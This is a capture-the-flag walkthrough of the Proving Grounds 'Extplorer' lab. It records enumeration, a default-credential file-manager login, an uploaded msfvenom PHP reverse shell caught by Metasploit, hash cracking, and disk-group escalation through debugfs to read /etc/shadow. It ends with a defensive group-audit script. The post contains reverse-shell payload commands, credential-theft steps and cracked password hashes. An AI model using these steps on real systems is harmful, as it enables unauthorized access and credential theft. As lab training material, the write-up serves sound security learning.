
Proving Grounds Practice - Extplorer

Difficulty

Medium

scans

[*] ssh found on tcp/22.
OpenSSH 8.2p1


[*] http found on tcp/80.
Apache/2.4.41 (Ubuntu)

80 wordpress

gobuster dir -w /usr/share//wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.212.16:80 -t 40
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.212.16:80
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share//wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 321] [--> http://192.168.212.16/wp-content/]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.212.16/wordpress/]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.212.16/wp-includes/]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.212.16/wp-admin/]

wpscan confirms version 6.2; no plugins were detected.

wpscan --url http://192.168.212.16 -v
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.212.16/ [192.168.212.16]
[+] Effective URL: http://192.168.212.16/wp-admin/setup-config.php
[+] Started: Sat Feb 15 23:15:32 2025

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] WordPress readme found: http://192.168.212.16/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] WordPress version 6.2 identified (Insecure, released on 2023-03-29).
| Found By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
| - http://192.168.212.16/wp-includes/css/dashicons.min.css?ver=6.2
| Confirmed By:
| Common Wp Includes Query Parameter In Homepage (Passive Detection)
| - http://192.168.212.16/wp-includes/css/buttons.min.css?ver=6.2
| Style Etag (Aggressive Detection)
| - http://192.168.212.16/wp-admin/load-styles.php, Match: '6.2'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:08 <=================================================================> (137 / 137) 100.00% Time: 00:00:08

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Feb 15 23:16:51 2025
[+] Requests Done: 169
[+] Cached Requests: 5
[+] Data Sent: 35.328 KB
[+] Data Received: 42.482 KB
[+] Memory used: 208.801 MB
[+] Elapsed time: 00:01:18

Trying default usernames and passwords gave no results.

foothold

gobuster finds the directory filemanager

gobuster dir -w /usr/share//wordlists/dirb/common.txt -u http://192.168.212.16:80 -t 40
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.212.16:80
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share//wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/filemanager (Status: 301) [Size: 322] [--> http://192.168.212.16/filemanager/]
/index.php (Status: 302) [Size: 0] [--> http://192.168.212.16:80/wp-admin/setup-config.php]
/server-status (Status: 403) [Size: 279]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.212.16/wordpress/]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.212.16/wp-admin/]
/wp-content (Status: 301) [Size: 321] [--> http://192.168.212.16/wp-content/]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.212.16/wp-includes/]
/xmlrpc.php (Status: 302) [Size: 0] [--> http://192.168.212.16:80/wp-admin/setup-config.php]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Logging in with admin:admin works, and the account has file-upload permission. Generate a webshell with msfvenom -p php/reverse_php LHOST=192.168.45.184 LPORT=4444 -f raw -o shell.php, upload it, and request curl ip:port/filemanager/shell.php to get a shell.

rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.16] 57546
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
fwupd-refresh:x:113:117:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
dora:x:1000:1000::/home/dora:/bin/sh

cd /home/dora
ls
local.txt

cat local.txt

ls -al local.txt
-r-------- 1 dora dora 33 Feb 16 02:29 local.txt

Checking /etc/passwd shows a user dora. dora's home directory contains local.txt, but www-data has no permission to read it. Searching /var/www/html for dora (grep dora * -r) reveals dora's hash: $2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS

$ cd /var/www/html
$ grep dora * -r
filemanager/config/.htusers.php: array('dora','$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS','/var/www/html','http://localhost','1','','0',1),
wp-includes/js/plupload/moxie.js: /(joli|[kxln]?ubuntu|debian|[open]*suse|gentoo|arch|slackware|fedora|mandriva|centos|pclinuxos|redhat|zenwalk|linpus)[\/\s-]?([\w\.-]+)*/i,
wp-includes/js/plupload/moxie.js: // Fedora/Mandriva/CentOS/PCLinuxOS/RedHat/Zenwalk/Linpus

hashcat cracks the password: doraemon

hashcat -h |grep '$2a'
hashcat -h |grep '$2'
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System

hashcat -m 3200 dora.hash /usr/share/wordlists/rockyou.txt

SSH login fails; only key-based authentication is allowed.

ssh dora@192.168.212.16
The authenticity of host '192.168.212.16 (192.168.212.16)' can't be established.
ED25519 key fingerprint is SHA256:VnMMoSlX8Y0MsU947B2bAEqDX+KmnqpFLFXtLgsOERw.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.212.16' (ED25519) to the list of known hosts.
dora@192.168.212.16: Permission denied (publickey).

But in the reverse www-data shell I could not upgrade to an interactive shell: python, script, perl and socat were all tried and none worked. In the end I used msf to get a shell, from which switching user works normally.

Generate the msf reverse shell payload with msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.45.234 LPORT=4444 -f raw -o r.php

use exploit/multi/fileformat/js_unpacker_eval_injection
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set Lhost tun0
Lhost => 192.168.45.234
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.45.234:4444
[*] Sending stage (39927 bytes) to 192.168.212.16
se[*] Meterpreter session 1 opened (192.168.45.234:4444 -> 192.168.212.16:37902) at 2025-02-16 12:47:41 +0800

meterpreter > shell
Process 34439 created.
Channel 0 created.
su dora
Password: doraemon
id
uid=1000(dora) gid=1000(dora) groups=1000(dora),6(disk)

escalation

diskgroup

id
uid=1000(dora) gid=1000(dora) groups=1000(dora),6(disk)

The dora user is a member of the disk group; for details see: Disk-group privilege escalation

First check which disk is mounted for /root: /dev/mapper/ubuntu--vg-ubuntu--lv is mounted at /, so run debugfs /dev/mapper/ubuntu--vg-ubuntu--lv

It turns out files cannot be written, so writing a public key and then logging in over ssh is not an option; there is also no key pair under /root/.ssh, only an authorized_keys file.

Read /etc/shadow and obtain the root hash: $6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhDiv2Yw.XcU.Q8n1YO05.a/4.D/x4ojQAkPnv/v7Qrw7Ici7.hs0sZiC.

$ df -h
Filesystem Size Used Avail Use% Mounted on
udev 947M 0 947M 0% /dev
tmpfs 199M 1.2M 198M 1% /run
/dev/mapper/ubuntu--vg-ubuntu--lv 9.8G 5.1G 4.3G 55% /
tmpfs 992M 0 992M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 992M 0 992M 0% /sys/fs/cgroup
/dev/loop0 62M 62M 0 100% /snap/core20/1611
/dev/loop2 50M 50M 0 100% /snap/snapd/18596
/dev/loop1 64M 64M 0 100% /snap/core20/1852
/dev/loop3 92M 92M 0 100% /snap/lxd/24061
/dev/loop4 68M 68M 0 100% /snap/lxd/22753
/dev/sda2 1.7G 209M 1.4G 13% /boot
tmpfs 199M 0 199M 0% /run/user/1000
$ debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
debugfs 1.45.5 (07-Jan-2020)
debugfs: mkdir test
mkdir: Filesystem opened read/only
debugfs: ls /root/.ssh
debugfs: cd /root/.ssh
debugfs: ls
authorized_keys

debugfs: cat /etc/shadow
root:$6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhDiv2Yw.XcU.Q8n1YO05.a/4.D/x4ojQAkPnv/v7Qrw7Ici7.hs0sZiC.:19453:0:99999:7:::
daemon:*:19235:0:99999:7:::
bin:*:19235:0:99999:7:::
sys:*:19235:0:99999:7:::
sync:*:19235:0:99999:7:::
games:*:19235:0:99999:7:::
man:*:19235:0:99999:7:::
lp:*:19235:0:99999:7:::
mail:*:19235:0:99999:7:::
news:*:19235:0:99999:7:::
uucp:*:19235:0:99999:7:::
proxy:*:19235:0:99999:7:::
www-data:*:19235:0:99999:7:::
backup:*:19235:0:99999:7:::
list:*:19235:0:99999:7:::
irc:*:19235:0:99999:7:::
gnats:*:19235:0:99999:7:::
nobody:*:19235:0:99999:7:::
systemd-network:*:19235:0:99999:7:::
systemd-resolve:*:19235:0:99999:7:::
systemd-timesync:*:19235:0:99999:7:::
messagebus:*:19235:0:99999:7:::
syslog:*:19235:0:99999:7:::
_apt:*:19235:0:99999:7:::
tss:*:19235:0:99999:7:::
uuidd:*:19235:0:99999:7:::
tcpdump:*:19235:0:99999:7:::
landscape:*:19235:0:99999:7:::
pollinate:*:19235:0:99999:7:::
usbmux:*:19381:0:99999:7:::
sshd:*:19381:0:99999:7:::
systemd-coredump:!!:19381::::::
lxd:!:19381::::::
fwupd-refresh:*:19381:0:99999:7:::
dora:$6$PkzB/mtNayFM5eVp$b6LU19HBQaOqbTehc6/LEk8DC2NegpqftuDDAvOK20c6yf3dFo0esC0vOoNWHqvzF0aEb3jxk39sQ/S4vGoGm/:19453:0:99999:7:::

Cracking it gives the password explorer

hashcat -h |grep '$6'
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
22921 | RSA/DSA/EC/OpenSSH Private Keys ($6$) | Private Key

hashcat -m 1800 root.hash /usr/share/wordlists/rockyou.txt
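The whole escalation rests on one fact that `id` showed right away: dora is in the disk group, so the raw root filesystem is readable with debugfs. The Python script below is an added example for this writeup (not part of the original post): it is the host-side audit that flags any non-root account in a group that grants root-equivalent access (disk, lxd, docker, sudo, wheel, shadow), counting both supplementary membership from /etc/group and primary-group membership from /etc/passwd, which /etc/group does not list. The SAMPLE_GROUP and SAMPLE_PASSWD texts are constructed to mirror this box; audit_host() reads the real files.

```python
"""Flag non-root accounts in groups that grant root-equivalent access.

Added example for this writeup, not part of the original post. The sample
group/passwd texts are constructed; audit_host() reads the live files.
"""

# Any non-root member of these groups can read raw disks, control containers,
# or escalate outright, so each is effectively root.
SENSITIVE_GROUPS = ("disk", "lxd", "docker", "sudo", "wheel", "shadow")


def parse_group(group_text):
    """Return {group_name: (gid, set(members))} from /etc/group contents."""
    groups = {}
    for line in group_text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def parse_passwd(passwd_text):
    """Return {user_name: primary_gid} from /etc/passwd contents."""
    users = {}
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        users[fields[0]] = int(fields[3])
    return users


def sensitive_members(group_text, passwd_text, sensitive=SENSITIVE_GROUPS):
    """Map each sensitive group to the sorted non-root users in it.

    Supplementary membership (4th field of /etc/group) and primary membership
    (gid field of /etc/passwd) are both counted, because `id` reports both.
    """
    groups = parse_group(group_text)
    primary = parse_passwd(passwd_text)
    report = {}
    for gname in sensitive:
        if gname not in groups:
            continue
        gid, members = groups[gname]
        members = set(members) | {u for u, g in primary.items() if g == gid}
        members.discard("root")
        if members:
            report[gname] = sorted(members)
    return report


def audit_host():
    """Run the check against the live /etc/group and /etc/passwd."""
    with open("/etc/group") as g, open("/etc/passwd") as p:
        return sensitive_members(g.read(), p.read())


# Constructed samples: dora is a supplementary member of disk (gid 6), as on
# this box, and a hypothetical 'ci' user has docker as its primary group,
# which only shows up through /etc/passwd.
SAMPLE_GROUP = """root:x:0:
adm:x:4:syslog
disk:x:6:dora
sudo:x:27:
lxd:x:118:
docker:x:999:
dora:x:1000:
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
dora:x:1000:1000::/home/dora:/bin/sh
ci:x:1001:999::/home/ci:/bin/bash
"""

if __name__ == "__main__":
    import sys
    result = audit_host() if "--live" in sys.argv else sensitive_members(SAMPLE_GROUP, SAMPLE_PASSWD)
    for gname, users in result.items():
        print(f"{gname}: {', '.join(users)}")
```

Run with --live on a real host; a non-empty report is a finding to fix (remove the user from the group, or accept that the user is root), which is exactly the condition linpeas highlighted here and the writeup's reflection says was skipped.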

Reflection

  1. For privilege escalation, I saw that dora had group 6(disk), and linpeas even highlighted it in yellow as exploitable; why did I still ignore it at first?

    I still tried the things I was familiar with first. Start with the most obvious.